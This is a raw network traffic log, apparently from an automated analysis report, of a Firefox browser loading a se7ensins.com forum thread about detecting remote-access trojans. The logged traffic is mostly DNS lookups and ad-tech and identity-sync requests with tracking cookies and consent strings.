GET /e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=5&ws=1280x552&v=24.506.1519&t=2000&slots=%5B%7B%22id%22%3A%22aps_springserve_outstream_ron%22%2C%22mt%22%3A%22v%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&vm=%7B%22ids%22%3A%7B%22audigent%22%3A%22%257B%2522hadronId%2522%253A%25220001yum0eabfdiledfja6b687lg8falbdjeell6ekeabackkc2jl%2522%257D%22%2C%22id5%22%3A%22ID5*NQlRTNx5ZAOqP9LwA08SRcb8Mr7g4fEqc01CjXERBsSiBZ8tjCSWgJ-p-RSuQIqIodhIfg7Ia1JeC8s91KiYAaHJ1hOpW0boy51YONBr1jOh_BQOsbSLXytHAYBhLKF7od0OoZ_NbUtIj-xihNMF9qHtT5rjlhxelqvFrRUfFhejTj2EwoWIH32-rRGt8SHAog8u3wwyYUaDV24frJbb0w%22%2C%22pubcommon%22%3A%22a56c6a5c-fb27-451e-90d1-520be70f2f04%22%7D%7D&_c=1 HTTP/2.0
host: aax.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
content-length: 1742
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
timing-allow-origin: *
date: Sun, 26 May 2024 02:07:00 GMT
server: Server
x-cache: Miss from cloudfront
via: 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: UXwI3Ul20jOM-a3FIwcEh6U2J_h3t_uR8xZXFHGR5MxcRAmAbsMvCg==
DNS

euw-ice.360yield.com

firefox.exe

Remote address:

8.8.8.8:53

Request

euw-ice.360yield.com

IN AAAA

Response
DNS

u.openx.net

firefox.exe

Remote address:

8.8.8.8:53

Request

u.openx.net

IN AAAA

Response
DNS

tpc.googlesyndication.com

firefox.exe

Remote address:

8.8.8.8:53

Request

tpc.googlesyndication.com

IN A

Response

tpc.googlesyndication.com

IN A

172.217.16.225
DNS

iad-2-sync.go.sonobi.com

firefox.exe

Remote address:

8.8.8.8:53

Request

iad-2-sync.go.sonobi.com

IN AAAA

Response

iad-2-sync.go.sonobi.com

IN AAAA

2607:f350:3:2569:0:10:0:200c

iad-2-sync.go.sonobi.com

IN AAAA

2607:f350:3:2569:0:10:0:c

iad-2-sync.go.sonobi.com

IN AAAA

2607:f350:3:2569:0:10:0:200d

iad-2-sync.go.sonobi.com

IN AAAA

2607:f350:3:2569:0:10:0:d
DNS

p.ad.gt.cdn.cloudflare.net

firefox.exe

Remote address:

8.8.8.8:53

Request

p.ad.gt.cdn.cloudflare.net

IN A

Response

p.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69

p.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69

p.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234
DNS

dnacdn.net

firefox.exe

Remote address:

8.8.8.8:53

Request

dnacdn.net

IN A

Response

dnacdn.net

IN A

178.250.7.13
DNS

p.ad.gt.cdn.cloudflare.net

firefox.exe

Remote address:

8.8.8.8:53

Request

p.ad.gt.cdn.cloudflare.net

IN AAAA

Response

p.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::ac43:17ea

p.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:445

p.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:545
DNS

dnacdn.net

firefox.exe

Remote address:

8.8.8.8:53

Request

dnacdn.net

IN A

Response

dnacdn.net

IN A

178.250.7.13
DNS

6.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

6.200.250.142.in-addr.arpa

IN PTR

Response

6.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f61e100net
DNS

221.148.162.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

221.148.162.3.in-addr.arpa

IN PTR

Response

221.148.162.3.in-addr.arpa

IN PTR

server-3-162-148-221dub56r cloudfrontnet
DNS

dnacdn.net

firefox.exe

Remote address:

8.8.8.8:53

Request

dnacdn.net

IN AAAA

Response
DNS

lb.eu-1-id5-sync.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lb.eu-1-id5-sync.com

IN A

Response

lb.eu-1-id5-sync.com

IN A

162.19.138.82

lb.eu-1-id5-sync.com

IN A

162.19.138.83

lb.eu-1-id5-sync.com

IN A

162.19.138.120

lb.eu-1-id5-sync.com

IN A

162.19.138.117

lb.eu-1-id5-sync.com

IN A

141.95.98.65

lb.eu-1-id5-sync.com

IN A

162.19.138.116

lb.eu-1-id5-sync.com

IN A

141.95.33.120

lb.eu-1-id5-sync.com

IN A

162.19.138.119

lb.eu-1-id5-sync.com

IN A

141.95.98.64

lb.eu-1-id5-sync.com

IN A

162.19.138.118
DNS

lb.eu-1-id5-sync.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lb.eu-1-id5-sync.com

IN A

Response

lb.eu-1-id5-sync.com

IN A

162.19.138.116

lb.eu-1-id5-sync.com

IN A

141.95.98.65

lb.eu-1-id5-sync.com

IN A

141.95.33.120

lb.eu-1-id5-sync.com

IN A

162.19.138.82

lb.eu-1-id5-sync.com

IN A

162.19.138.118

lb.eu-1-id5-sync.com

IN A

141.95.98.64

lb.eu-1-id5-sync.com

IN A

162.19.138.120

lb.eu-1-id5-sync.com

IN A

162.19.138.83

lb.eu-1-id5-sync.com

IN A

162.19.138.117

lb.eu-1-id5-sync.com

IN A

162.19.138.119
DNS

lb.eu-1-id5-sync.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lb.eu-1-id5-sync.com

IN AAAA

Response
DNS

rp.liadm.com

firefox.exe

Remote address:

8.8.8.8:53

Request

rp.liadm.com

IN A

Response

rp.liadm.com

IN CNAME

livepixel-production.bln.liveintent.com

livepixel-production.bln.liveintent.com

IN A

3.233.179.64

livepixel-production.bln.liveintent.com

IN A

35.153.151.120

livepixel-production.bln.liveintent.com

IN A

3.217.103.161

livepixel-production.bln.liveintent.com

IN A

3.82.81.96

livepixel-production.bln.liveintent.com

IN A

100.25.66.205

livepixel-production.bln.liveintent.com

IN A

44.219.83.99

livepixel-production.bln.liveintent.com

IN A

18.210.34.134

livepixel-production.bln.liveintent.com

IN A

44.214.84.153
DNS

livepixel-production.bln.liveintent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

livepixel-production.bln.liveintent.com

IN A

Response

livepixel-production.bln.liveintent.com

IN A

34.230.98.106

livepixel-production.bln.liveintent.com

IN A

3.233.179.64

livepixel-production.bln.liveintent.com

IN A

3.82.81.96

livepixel-production.bln.liveintent.com

IN A

44.223.244.62

livepixel-production.bln.liveintent.com

IN A

34.203.127.214

livepixel-production.bln.liveintent.com

IN A

35.153.151.120

livepixel-production.bln.liveintent.com

IN A

3.92.155.74

livepixel-production.bln.liveintent.com

IN A

100.25.66.205
DNS

secure.cdn.fastclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

secure.cdn.fastclick.net

IN A

Response

secure.cdn.fastclick.net

IN CNAME

secure2.cdn.fastclick.net.edgekey.net

secure2.cdn.fastclick.net.edgekey.net

IN CNAME

e4536.g.akamaiedge.net

e4536.g.akamaiedge.net

IN A

23.53.174.156
DNS

cdn.id5-sync.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.id5-sync.com

IN A

Response

cdn.id5-sync.com

IN A

104.22.53.86

cdn.id5-sync.com

IN A

172.67.38.106

cdn.id5-sync.com

IN A

104.22.52.86
DNS

livepixel-production.bln.liveintent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

livepixel-production.bln.liveintent.com

IN AAAA

Response

livepixel-production.bln.liveintent.com

IN AAAA

2600:1f18:730:b130:bc58:c2f6:a336:a8c1

livepixel-production.bln.liveintent.com

IN AAAA

2600:1f18:730:b130:7cc9:4de4:bdd9:c825

livepixel-production.bln.liveintent.com

IN AAAA

2600:1f18:730:b110:87d9:eafb:1066:1389

livepixel-production.bln.liveintent.com

IN AAAA

2600:1f18:730:b150:ed7:b5a8:b001:32bf

livepixel-production.bln.liveintent.com

IN AAAA

2600:1f18:730:b150:4be:4d7f:78bf:7b32

livepixel-production.bln.liveintent.com

IN AAAA

2600:1f18:730:b110:da22:a7e9:2a83:baa4

livepixel-production.bln.liveintent.com

IN AAAA

2600:1f18:730:b130:e56:b6ca:9d8e:84e0

livepixel-production.bln.liveintent.com

IN AAAA

2600:1f18:730:b120:f176:60c3:7be3:d10d
GET

https://config.aps.amazon-adsystem.com/configs/0ab198dd-b265-462a-ae36-74e163ad6159

firefox.exe

Remote address:

18.66.171.125:443

Request

GET /configs/0ab198dd-b265-462a-ae36-74e163ad6159 HTTP/2.0
host: config.aps.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
content-length: 563
server: CloudFront
date: Sun, 26 May 2024 01:57:51 GMT
cache-control: max-age=3600
x-cache: Hit from cloudfront
via: 1.1 e2a6a95e8d95cf855c934397de0d60aa.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: FHkexztFMcHv1g6SdUKmwic9y0Pk9o6nzYb9NDW4PNM7_T9mvrX9Yg==
age: 517
DNS

e4536.g.akamaiedge.net

firefox.exe

Remote address:

8.8.8.8:53

Request

e4536.g.akamaiedge.net

IN A

Response

e4536.g.akamaiedge.net

IN A

23.53.174.156
DNS

cdn.id5-sync.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.id5-sync.com

IN A

Response

cdn.id5-sync.com

IN A

172.67.38.106

cdn.id5-sync.com

IN A

104.22.53.86

cdn.id5-sync.com

IN A

104.22.52.86
DNS

e4536.g.akamaiedge.net

firefox.exe

Remote address:

8.8.8.8:53

Request

e4536.g.akamaiedge.net

IN AAAA

Response
DNS

cdn.id5-sync.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.id5-sync.com

IN AAAA

Response

cdn.id5-sync.com

IN AAAA

2606:4700:10::6816:3556

cdn.id5-sync.com

IN AAAA

2606:4700:10::ac43:266a

cdn.id5-sync.com

IN AAAA

2606:4700:10::6816:3456
GET

https://ids.ad.gt/api/v1/g_hosted?id=AU1D-0100-001716689186-TBCHXBQA-GKIV

firefox.exe

Remote address:

104.22.5.69:443

Request

GET /api/v1/g_hosted?id=AU1D-0100-001716689186-TBCHXBQA-GKIV HTTP/2.0
host: ids.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 302

date: Sun, 26 May 2024 02:06:29 GMT
content-type: text/html; charset=utf-8
location: https://cm.g.doubleclick.net/pixel?google_nid=audigent_w_appnexus_3985&google_hm=QVUxRC0wMTAwLTAwMTcxNjY4OTE4Ni1UQkNIWEJRQS1HS0lW
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a34c7c85a66e8-AMS
GET

https://ids.ad.gt/api/v1/halo_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&halo_id=060bh77hl9gcakjahabj97ki7egale7aeahgs22s06qieywesegw62yu2mqe0m2em

firefox.exe

Remote address:

104.22.5.69:443

Request

GET /api/v1/halo_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&halo_id=060bh77hl9gcakjahabj97ki7egale7aeahgs22s06qieywesegw62yu2mqe0m2em HTTP/2.0
host: ids.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:29 GMT
content-type: image/gif
content-length: 43
cache-control: no-cache
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a34c7d86566e8-AMS
GET

https://ids.ad.gt/api/v1/ip_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV

firefox.exe

Remote address:

104.22.5.69:443

Request

GET /api/v1/ip_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV HTTP/2.0
host: ids.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:29 GMT
content-type: text/html; charset=utf-8
set-cookie: au_id=AU1D-0100-001716689186-TBCHXBQA-GKIV; Domain=ad.gt; Expires=Mon, 26 May 2025 02:06:29 GMT; Max-Age=31536000; Secure; Path=/; SameSite=None
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a34c7f86e66e8-AMS
content-encoding: gzip
GET

https://ids.ad.gt/api/v1/son_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&uid=4cbdb081-eac7-46d0-aa2c-aa791852dd26&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

firefox.exe

Remote address:

104.22.5.69:443

Request

GET /api/v1/son_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&uid=4cbdb081-eac7-46d0-aa2c-aa791852dd26&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: ids.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
cookie: au_id=AU1D-0100-001716689186-TBCHXBQA-GKIV
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:40 GMT
content-type: image/gif
content-length: 43
cache-control: no-cache
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a35103f9866e8-AMS
GET

https://ids.ad.gt/api/v1/g_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&google_error=3

firefox.exe

Remote address:

104.22.5.69:443

Request

GET /api/v1/g_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&google_error=3 HTTP/2.0
host: ids.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
cookie: au_id=AU1D-0100-001716689186-TBCHXBQA-GKIV
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:42 GMT
content-type: image/gif
content-length: 43
cache-control: no-cache
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a35189b3f66e8-AMS
GET

https://ids.ad.gt/api/v1/g_match?google_error=3

firefox.exe

Remote address:

104.22.5.69:443

Request

GET /api/v1/g_match?google_error=3 HTTP/2.0
host: ids.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
cookie: au_id=AU1D-0100-001716689186-TBCHXBQA-GKIV
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:43 GMT
content-type: image/gif
content-length: 43
cache-control: no-cache
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a351f2dbf66e8-AMS
GET

https://p.ad.gt/api/v1/p/474

firefox.exe

Remote address:

104.22.4.69:443

Request

GET /api/v1/p/474 HTTP/2.0
host: p.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:29 GMT
content-type: application/javascript
content-encoding: gzip
last-modified: Sun, 26 May 2024 02:03:26 GMT
cache-control: max-age=14400
cf-cache-status: HIT
age: 96
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a34c82d3fb948-AMS
DNS

125.171.66.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

125.171.66.18.in-addr.arpa

IN PTR

Response

125.171.66.18.in-addr.arpa

IN PTR

server-18-66-171-125dub56r cloudfrontnet
DNS

69.4.22.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

69.4.22.104.in-addr.arpa

IN PTR

Response
GET

https://image2.pubmatic.com/AdServer/UCookieSetPug?rd=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fpbm_match%3Fpbm%3D%23PM_USER_ID%26id%3DAU1D-0100-001716689186-TBCHXBQA-GKIV

firefox.exe

Remote address:

198.47.127.205:443

Request

GET /AdServer/UCookieSetPug?rd=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fpbm_match%3Fpbm%3D%23PM_USER_ID%26id%3DAU1D-0100-001716689186-TBCHXBQA-GKIV HTTP/2.0
host: image2.pubmatic.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 302

server: nginx
date: Sun, 26 May 2024 02:06:29 GMT
set-cookie: KTPCACOOKIE=true; domain=pubmatic.com; secure; expires=Sat, 24-Aug-2024 02:06:29 GMT; path=/
location: https://image2.pubmatic.com/AdServer/UCookieSetPug?ird=1&rd=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fpbm_match%3Fpbm%3D%23PM_USER_ID%26id%3DAU1D-0100-001716689186-TBCHXBQA-GKIV
p3p: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
cache-control: no-store, no-cache, private
GET

https://image2.pubmatic.com/AdServer/UCookieSetPug?ird=1&rd=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fpbm_match%3Fpbm%3D%23PM_USER_ID%26id%3DAU1D-0100-001716689186-TBCHXBQA-GKIV

firefox.exe

Remote address:

198.47.127.205:443

Request

GET /AdServer/UCookieSetPug?ird=1&rd=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fpbm_match%3Fpbm%3D%23PM_USER_ID%26id%3DAU1D-0100-001716689186-TBCHXBQA-GKIV HTTP/2.0
host: image2.pubmatic.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

server: nginx
date: Sun, 26 May 2024 02:06:39 GMT
content-type: text/html; charset=utf-8
p3p: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
cache-control: no-store, no-cache, private
content-encoding: gzip
GET

